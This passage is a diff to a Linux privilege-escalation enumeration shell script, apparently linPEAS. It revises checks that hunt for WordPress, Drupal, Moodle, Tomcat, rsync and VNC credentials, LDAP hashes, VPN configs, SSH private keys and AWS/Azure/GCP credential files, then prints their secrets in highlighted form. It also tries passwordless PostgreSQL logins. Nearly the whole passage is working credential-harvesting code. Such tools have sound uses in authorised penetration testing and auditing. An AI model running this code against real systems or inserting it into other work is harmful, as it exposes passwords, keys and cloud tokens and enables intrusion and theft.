"s,.*,${C}[1;31m&${C}[0m," + if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi printf $Y"[+] "$GREEN"PostgreSQL connection to template1 using pgsql/NOPASS ........... "$NC - if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m," + if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi echo "" @@ -1664,11 +1811,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then apachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null` if [ "$apachever" ]; then echo "Version: $apachever" - sitesenabled=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep "sites-enabled") + sitesenabled=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep "sites-enabled") printf "$sitesenabled\n" | while read d; do for f in "$d/*"; do grep "AuthType\|AuthName\|AuthUserFile\|ServerName\|ServerAlias" $f 2>/dev/null | grep -v "#" | sed "s,Auth|ServerName|ServerAlias,${C}[1;31m&${C}[0m,"; done; done if [ !"$sitesenabled" ]; then - default00=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep "000-default") - printf "$default00\n" | while read f; do grep "AuthType\|AuthName\|AuthUserFile\|ServerName\|ServerAlias" "$f" 2>/dev/null | grep -v "#" | sed -E "s,Auth|ServerName|ServerAlias,${C}[1;31m&${C}[0m,"; done + default00=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep "000-default") + printf "$default00\n" | while read f; do grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" "$f" 2>/dev/null | grep -v "#" | sed -${E} "s,Auth|ServerName|ServerAlias,${C}[1;31m&${C}[0m,"; done fi echo "PHP exec extensions" grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null @@ -1678,7 +1825,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) PHP cookies files phpsess1=`ls /var/lib/php/sessions 2>/dev/null` - phpsess2=$(echo "$FIND_TMP $FIND_VAR" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*') + phpsess2=$(echo "$FIND_TMP\n$FIND_VAR\n$FIND_MNT" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*') printf $Y"[+] "$GREEN"Searching PHPCookies\n"$NC if [ "$phpsess1" ] || [ "$phpsess2" ]; then if [ "$phpsess1" ]; then ls /var/lib/php/sessions 2>/dev/null; fi @@ -1689,42 +1836,60 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Wordpress user, password, databname and host printf $Y"[+] "$GREEN"Searching Wordpress wp-config.php files\n"$NC - wp=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'wp-config\.php$') + wp=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'wp-config\.php$') if [ "$wp" ]; then - echo "wp-config.php files found:\n$wp" - prtinf "$wp\n" | while read f; do grep "PASSWORD\|USER\|NAME\|HOST" "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done + printf "$wp\n" | while read f; do echo "$f"; grep -E "PASSWORD|USER|NAME|HOST" "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; echo ""; done else echo_not_found "wp-config.php" fi echo "" #-- SI) Drupal user, password, databname and host printf $Y"[+] "$GREEN"Searching Drupal settings.php files\n"$NC - drup=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'settings\.php$') - if [ "`echo $drup | grep '/default/settings.php'`" ]; then #Check path /default/settings.php - echo "settings.php files found:\n$drup" - printf "$drup\n" | while read f; do grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" $f 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done + drup=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'settings\.php$') + if [ "$drup" ]; then + printf "$drup\n" | while read f; do + if [ "`echo $f | grep '/default/settings.php'`" ]; then #Check path /default/settings.php + printf "Drupal settings.php file found: $f\n" + grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" $f 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; + echo "" + fi + done else echo_not_found "/default/settings.php" fi echo "" + #-- SI) Moodle user, password, databname and host + printf $Y"[+] "$GREEN"Searching Moodle config.php files\n"$NC + moo=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'config\.php$') + if [ "$moo" ]; then + printf "$moo\n" | while read f; do + if [ "`echo $f | grep -i moodle/config.php`" ]; then + printf "Moodle config.php file found: $f\n" + grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" $f 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; + fi + done + else echo_not_found "config.php inside a moodle folder" + fi + echo "" + #-- SI) Tomcat users printf $Y"[+] "$GREEN"Searching Tomcat users file\n"$NC - tomcat=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'tomcat-users\.xml$') + tomcat=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'tomcat-users\.xml$') if [ "$tomcat" ]; then echo "tomcat-users.xml file found: $tomcat" - printf "$tomcat\n" | while read f; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done + printf "$tomcat\n" | while read f; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; done else echo_not_found "tomcat-users.xml" fi echo "" #-- SI) Mongo Information printf $Y"[+] "$GREEN"Mongo information\n"$NC - mongos=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'mongod.*\.conf$') + mongos=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'mongod.*\.conf$') (mongo --version 2>/dev/null || mongod --version 2>/dev/null) || echo_not_found "mongo binary" printf "$mongos\n" | while read f; do if [ "$f" ]; then echo "Found $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,auth*=*true|pass.*,${C}[1;31m&${C}[0m," 2>/dev/null + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,auth*=*true|pass.*,${C}[1;31m&${C}[0m," 2>/dev/null fi done @@ -1733,34 +1898,36 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Supervisord conf file printf $Y"[+] "$GREEN"Searching supervisord configuration file\n"$NC - supervisor=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'supervisord\.conf') - if [ "$supervisor" ]; then - printf "$supervisor\n" - printf "$supervisor\n" | while read f; do cat "$f" 2>/dev/null | grep "port.*=\|username.*=\|password=.*" | sed -E "s,port|username|password,${C}[1;31m&${C}[0m,"; done + supervisorf=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'supervisord\.conf') + if [ "$supervisorf" ]; then + printf "$supervisorf\n" | while read f; do + echo "Found $f"; + cat "$f" 2>/dev/null | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port|username|password,${C}[1;31m&${C}[0m,"; + done else echo_not_found "supervisord.conf" fi echo "" #-- SI) Cesi conf file - cesi=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'cesi\.conf') + cesi=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'cesi\.conf') printf $Y"[+] "$GREEN"Searching cesi configuration file\n"$NC if [ "$cesi" ]; then printf "$cesi\n" - printf "$cesi\n" | while read f; do cat "$f" 2>/dev/null | grep "username.*=\|password.*=\|host.*=\|port.*=\|database.*=" | sed -E "s,username|password|database,${C}[1;31m&${C}[0m,"; done + printf "$cesi\n" | while read f; do cat "$f" 2>/dev/null | grep "username.*=\|password.*=\|host.*=\|port.*=\|database.*=" | sed -${E} "s,username|password|database,${C}[1;31m&${C}[0m,"; done else echo_not_found "cesi.conf" fi echo "" #-- SI) Rsyncd conf file - rsyncd=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'rsyncd\.conf|rsyncd\.secrets') + rsyncd=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'rsyncd\.conf|rsyncd\.secrets') printf $Y"[+] "$GREEN"Searching Rsyncd config file\n"$NC if [ "$rsyncd" ]; then printf "$rsyncd\n" | while read f; do printf "$f\n" if [ `echo "$f" | grep -i "secrets"` ]; then - cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else - cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,secrets.*|auth.*users.*=,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,secrets.*|auth.*users.*=,${C}[1;31m&${C}[0m," fi echo "" done @@ -1769,7 +1936,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Hostapd conf file printf $Y"[+] "$GREEN"Searching Hostapd config file\n"$NC - hostapd=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'hostapd\.conf') + hostapd=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'hostapd\.conf') if [ "$hostapd" ]; then printf $Y"[+] "$GREEN"Hostapd conf was found\n"$NC printf "$hostapd\n" @@ -1789,7 +1956,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Anaconda-ks conf files printf $Y"[+] "$GREEN"Searching Anaconda-ks config files\n"$NC - anaconda=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'anaconda-ks\.cfg') + anaconda=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'anaconda-ks\.cfg') if [ "$anaconda" ]; then printf "$anaconda\n" printf "$anaconda\n" | while read f; do cat "$f" 2>/dev/null | grep "rootpw" | sed "s,rootpw.*,${C}[1;31m&${C}[0m,"; done @@ -1799,34 +1966,34 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) VNC files printf $Y"[+] "$GREEN"Searching .vnc directories and their passwd files\n"$NC - vnc=$(echo "$FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_USERS" | grep -E '\.vnc') + vnc=$(echo "$FIND_DIR_HOME\n$FIND_DIR_USERS\n$FIND_DIR_MNT" | grep -E '\.vnc') if [ "$vnc" ]; then printf "$vnc\n" - printf "$vnc\n" | while read d; do find "$d" -name "passwd" -exec ls -l {} \; 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done + printf "$vnc\n" | while read d; do find "$d" -name "passwd" -exec ls -l {} \; 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; done else echo_not_found ".vnc" fi echo "" #-- SI) LDAP directories printf $Y"[+] "$GREEN"Searching ldap directories and their hashes\n"$NC - ldap=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep -E 'ldap$') + ldap=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'ldap$') if [ "$ldap" ]; then printf "$ldap\n" echo "The password hash is from the {SSHA} to 'structural'"; - printf "$ldap" | while read d; do cat "$d/*.bdb" 2>/dev/null | grep -i -a -E -o "description.*" | sort | uniq | sed -E "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${C}[1;31m&${C}[0m,g"; done + printf "$ldap" | while read d; do cat "$d/*.bdb" 2>/dev/null | grep -i -a -E -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${C}[1;31m&${C}[0m,g"; done else echo_not_found "ldap" fi echo "" #-- SI) .ovpn files printf $Y"[+] "$GREEN"Searching .ovpn files and credentials\n"$NC - ovpn=$(echo "$FIND_ETC $FIND_USR $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '\.ovpn') + ovpn=$(echo "$FIND_ETC\n$FIND_USR\n$FIND_HOME\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '\.ovpn') if [ "$ovpn" ]; then printf "$ovpn\n" printf "$ovpn\n" | while read f; do if [ -r "$f" ]; then echo "Checking $f:" - cat "$f" 2>/dev/null | grep "auth-user-pass" | sed -E "s,auth-user-pass.*,${C}[1;31m&${C}[0m,"; + cat "$f" 2>/dev/null | grep "auth-user-pass" | sed -${E} "s,auth-user-pass.*,${C}[1;31m&${C}[0m,"; fi done else echo_not_found ".ovpn" @@ -1835,13 +2002,13 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) ssh files printf $Y"[+] "$GREEN"Searching ssl/ssh files\n"$NC - ssh=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_MNT $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'id_dsa.*|id_rsa.*|known_hosts|authorized_hosts|authorized_keys') - certsb4=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_MNT $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pem|.*\.cer|.*\.crt' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib.*') + ssh=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'id_dsa.*|id_rsa.*|known_hosts|authorized_hosts|authorized_keys') + certsb4=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pem|.*\.cer|.*\.crt' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib.*') if [ "$certsb4" ]; then certsb4_grep=`grep -L "\"\|'\|(" $certsb4 2>/dev/null`; fi - certsbin=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_MNT $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.csr|.*\.der' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib/.*') - clientcert=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_MNT $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pfx|.*\.p12' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib/.*') + certsbin=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.csr|.*\.der' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib/.*') + clientcert=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pfx|.*\.p12' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib/.*') sshagents=$(echo "$FIND_TMP" | grep -E 'agent.*') - homesshconfig=$(echo "$FIND_HOME $FIND_ROOT $FIND_USERS" | grep -E 'config' | grep "ssh") + homesshconfig=$(echo "$FIND_HOME $FIND_USR" | grep -E 'config' | grep "ssh") sshconfig="`ls /etc/ssh/ssh_config 2>/dev/null`" hostsdenied="`ls /etc/hosts.denied 2>/dev/null`" hostsallow="`ls /etc/hosts.allow 2>/dev/null`" @@ -1850,11 +2017,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf "$ssh\n" fi - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -E "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${C}[1;31m&${C}[0m," + grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${C}[1;31m&${C}[0m," if [ "$TIMEOUT" ]; then privatekeyfilesetc=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null` - privatekeyfileshome=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /home 2>/dev/null` + privatekeyfileshome=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null` privatekeyfilesroot=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null` privatekeyfilesmnt=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null` else @@ -1863,11 +2030,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then fi if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - printf "Possible private SSH keys were found!\n" | sed -E "s,.*,${C}[1;31m&${C}[0m," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi + printf "Possible private SSH keys were found!\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi fi if [ "$certsb4_grep" ] || [ "$certsbin" ]; then echo " --> Some certificates were found (out limited):" @@ -1889,24 +2056,24 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if [ "$homesshconfig" ]; then echo " --> Some home ssh config file was found" printf "$homesshconfig\n" - printf "$homesshconfig\n" | while read f; do cat "$f" 2>/dev/null | grep -v "^$" | sed -E "s,User|ProxyCommand,${C}[1;31m&${C}[0m,"; done + printf "$homesshconfig\n" | while read f; do cat "$f" 2>/dev/null | grep -v "^$" | sed -${E} "s,User|ProxyCommand,${C}[1;31m&${C}[0m,"; done fi if [ "$hostsdenied" ]; then echo " --> /etc/hosts.denied file found, read the rules:" printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -E "s,.*,${C}[1;32m&${C}[0m," + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -${E} "s,.*,${C}[1;32m&${C}[0m," echo "" fi if [ "$hostsallow" ]; then echo " --> /etc/hosts.allow file found, read the rules:" printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," echo "" fi if [ "$sshconfig" ]; then echo "" echo "Searching inside /etc/ssh/ssh_config for interesting info" - cat /etc/ssh/ssh_config 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,Host|ForwardAgent|User|ProxyCommand,${C}[1;31m&${C}[0m," + cat /etc/ssh/ssh_config 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${C}[1;31m&${C}[0m," fi echo "" @@ -1914,20 +2081,20 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf $Y"[+] "$GREEN"Searching unexpected auth lines in /etc/pam.d/sshd\n"$NC pamssh=`cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth` if [ "$pamssh" ]; then - cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi echo "" #-- SI) Cloud keys printf $Y"[+] "$GREEN"Searching Cloud credentials (AWS, Azure, GC)\n"$NC - cloudcreds=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|accessTokens\.json$|azureProfile\.json$') + cloudcreds=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|accessTokens\.json$|azureProfile\.json$') if [ "$cloudcreds" ]; then printf "$cloudcreds\n" | while read f; do if [ -f "$f" ]; then #Check if file, here we only look for filenames, not dirs - printf "Trying to read $f\n" | sed -E "s,credentials|credentials.db|legacy_credentials.db|access_tokens.db|accessTokens.json|azureProfile.json,${C}[1;31m&${C}[0m,g" + printf "Trying to read $f\n" | sed -${E} "s,credentials|credentials.db|legacy_credentials.db|access_tokens.db|accessTokens.json|azureProfile.json,${C}[1;31m&${C}[0m,g" if [ -r "$f" ]; then - cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,g" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" fi echo "" fi @@ -1938,7 +2105,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) NFS exports printf $Y"[+] "$GREEN"NFS exports?\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe\n"$NC - if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -E "s,no_root_squash|no_all_squash ,${C}[1;31;103m&${C}[0m," | sed -E "s,insecure,${C}[1;31m&${C}[0m," + if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${C}[1;31;103m&${C}[0m," | sed -${E} "s,insecure,${C}[1;31m&${C}[0m," else echo_not_found "/etc/exports" fi echo "" @@ -1946,27 +2113,49 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Kerberos printf $Y"[+] "$GREEN"Searching kerberos conf files and tickets\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt\n"$NC - krb5=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep -E 'krb5\.conf') - if [ "$krb5" ]; then - printf "$krb5\n" | while read f; do - if [ -r "$f" ]; then - cat "$f" 2>/dev/null | grep default_ccache_name | sed -E "s,default_ccache_name,${C}[1;31m&${C}[0m,"; + kadmin_exists="`command -v kadmin`" + klist_exists="`command -v klist`" + if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${C}[1;31m&${C}[0m,"; fi + if [ "$klist_exists" ] && [ -x 